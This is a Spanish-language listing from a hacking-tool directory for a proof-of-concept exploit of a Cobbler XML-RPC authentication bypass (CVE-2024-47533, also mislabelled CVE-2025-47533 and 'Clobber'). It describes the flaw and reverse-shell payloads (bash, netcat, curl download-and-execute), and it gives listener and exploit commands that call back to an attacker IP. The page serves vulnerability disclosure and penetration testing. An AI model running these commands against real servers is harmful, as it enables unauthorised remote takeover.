Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-47533 — PoC de CVE-2025-47533 Clobber RCE | Kitploit
Herramientas/GitHubGitHub/zs1n/cve-2024-47533
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubzs1n/cve-2024-47533

CVE-2024-47533

PoC de CVE-2025-47533 Clobber RCE

Ver Repositorio
1hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-47533 - Exploit de RCE por Bypass de Autenticación en Cobbler XMLRPC

Ejecución Remota de Código Crítica mediante Bypass de Autenticación en Cobbler

Implementación del PoC.


Resumen

Cobbler, un servidor de instalación de Linux que permite el aprovisionamiento rápido de entornos de instalación en red, tiene una vulnerabilidad de autenticación en las versiones 3.0.0 hasta (pero sin incluir) 3.2.3 y 3.3.7. La función utils.get_shared_secret() siempre devuelve -1, lo que permite que cualquier persona se conecte a la interfaz XML-RPC de Cobbler con un nombre de usuario vacío ('') y la contraseña -1. Esto permite que un atacante con acceso a la red obtenga el control total del servidor Cobbler. La vulnerabilidad está corregida en las versiones 3.2.3 y 3.3.7.


🛠 Desglose Técnico

La vulnerabilidad se debe al manejo incorrecto del secreto compartido en la función utils.get_shared_secret(), que siempre devuelve -1, evitando efectivamente la autenticación. Esto permite que cualquier usuario de la red se conecte a la interfaz XMLRPC de Cobbler con credenciales vacías y ejecute comandos arbitrarios.


🔥 Endpoint Vulnerable

http://<target>:25151/ — endpoint de la API XMLRPC de Cobbler


💥 Ejemplos de Payloads

El script del exploit admite varios payloads de shell inversa, incluyendo:

  • Shell inversa Bash
  • Shells de Netcat (nc)
  • Curl descargar y ejecutar

Prueba de Concepto (PoC)

Preparando el Listener

Inicia un listener de Netcat en tu máquina:

root@kitploit:~
nc -lvnp 4444

🚀 Lanzando el Exploit

Ejecuta el script del exploit CVE-2024-47533.py.

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Parámetros

-t : Objetivo (Ejemplo: -t http://1<IP_SERVICE>:<PORT>)

-l: IP Local (Ejemplo: -l 10.10.11.80)

-p : Puerto <LOCAL_PORT> (Ejemplo: -p 4444)

--payload: Payload(bash, curl, nc) (Ejemplo: --payload bash)

💻 Acceso Exitoso a la Shell Remota

Con una ejecución exitosa, la shell inversa se conectará de vuelta al listener, otorgando al atacante acceso remoto al servidor.

Descargar herramienta